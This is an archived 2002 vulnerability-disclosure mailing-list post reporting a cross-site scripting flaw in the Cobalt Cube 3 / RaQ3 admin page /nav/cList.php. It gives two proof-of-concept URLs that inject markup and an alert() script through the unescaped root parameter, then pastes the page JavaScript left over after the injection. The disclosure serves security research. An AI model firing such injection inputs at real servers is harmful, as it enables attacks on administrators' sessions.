Vulnerability Development mailing list archives
Cobalt cube3 css
From: KF <dotslash () snosoft com>
Date: Fri, 01 Mar 2002 14:49:55 -0500
Alex Hernandez just did a great write-up on Cobalt Cube 4s. I took a few minutes to check out my Cube 3 and ended up finding a CSS (cross-site scripting) issue as well. Below is the info from my 2 second audit.
<mailto:al3xhernandez () ureach com>
Try either of the following URLs against your RAQ3:
http://host/nav/cList.php?root=</script><h1>www.snosoft.com rocks</h1>
http://host/nav/cList.php?root=</script><script>alert('Snosoft Rocks')/<script>
You will see your code, followed by this chunk of JavaScript code that the page was trying to run. The stray "; at the start of the leftover output suggests that the root parameter is echoed unescaped into a JavaScript string inside an inline script block, so the supplied </script> closes that block early and the remainder of the page's own script is rendered as text.
"; // get tab configuration from parameter var isTabbed = true; if("" == "false") isTabbed = false; // build site map siteMap = new Object(); top.siteMap = siteMap; siteMap.documentation = new top.code.mItem_Item("documentation", "User Manuals", "Browse the Cobalt server documentation.", "", "/base/documentation/viewManual.php", false, true, ""); siteMap.documentation_folder = new top.code.mItem_Item("documentation_folder", "Documentation", "On-line product manuals and documentation.", "", "", false, true, ""); siteMap.documentation_logout = new top.code.mItem_Item("documentation_logout", "Close", "Click to close the documentation browser", "logout", "/base/documentation/logout.php", false, true, ""); siteMap.documentation_root = new top.code.mItem_Item("documentation_root", "", "", "", "", false, true, ""); siteMap.base_manual = new top.code.mItem_Item("base_manual", "View Documentation", "Click here to view documentation. 
", "", "javascript: open(\047/base/documentation/viewManual.php?\047); top.code.cList_repaint(1);", false, true, ""); siteMap.base_manualButton = new top.code.mItem_Item("base_manualButton", "View Documentation", "Click here to view on-line product manuals and documentation.", "manualOff", "javascript: open(\047/nav/cList.php?root=documentation_root\047); top.code.tab_repaint();", false, true, ""); siteMap.base_cacheACL = new top.code.mItem_Item("base_cacheACL", "Restricted Access", "Web access can be controlled here if this server is being used as a gateway or proxy.", "", "/base/cacheACL/acl.php", false, true, ""); siteMap.base_cache = new top.code.mItem_Item("base_cache", "Web Caching", "Web Caching Settings can be changed here.", "", "/base/cache/cache.php", false, true, ""); siteMap.base_disk_usage = new top.code.mItem_Item("base_disk_usage", "Disk", "Disk usage statistics can be viewed here.", "", "/base/quotastats/diskusage.php", false, true, ""); siteMap.base_webstats = new top.code.mItem_Item("base_webstats", "Web", "Web server usage statistics can be found here.", "", "/base/webstats/webtotals.php", false, true, ""); siteMap.base_amSettings = new top.code.mItem_Item("base_amSettings", "Settings", "Active Monitor Settings can be configured here.", "", "/base/am/amSettings.php", false, true, ""); siteMap.base_amStatus = new top.code.mItem_Item("base_amStatus", "Status", "Active Monitor status information can be viewed here.", "", "/base/am/amStatus.php", false, true, ""); siteMap.base_monitor = new top.code.mItem_Item("base_monitor", "Active Monitor", "System components can be checked for correct operation here.", "", "", false, true, ""); siteMap.base_monitorLight = new top.code.mItem_Item("base_monitorLight", "Active Monitor", "Click here to view Active Monitor status information. 
This icon turns red if any of the components monitored by Active Monitor have severe problems.", "monitorOff", "javascript: top.code.tab_selectPath(\047base_amStatus\047); top.code.cList_selectPath(\047base_amStatus\047)", false, true, ""); siteMap.base_backup = new top.code.mItem_Item("base_backup", "Backup", "Backups can be scheduled and viewed here.", "", "/base/backup/scheduleList.php", false, true, ""); siteMap.base_restore = new top.code.mItem_Item("base_restore", "Restore", "Restores can be selected and activated here.", "", "/base/backup/restoreList.php", false, true, ""); siteMap.webmail_compose = new top.code.mItem_Item("webmail_compose", "Compose", "Click here to compose a new email message.", "", "/base/webmail/compose.php", false, true, ""); siteMap.webmail = -KF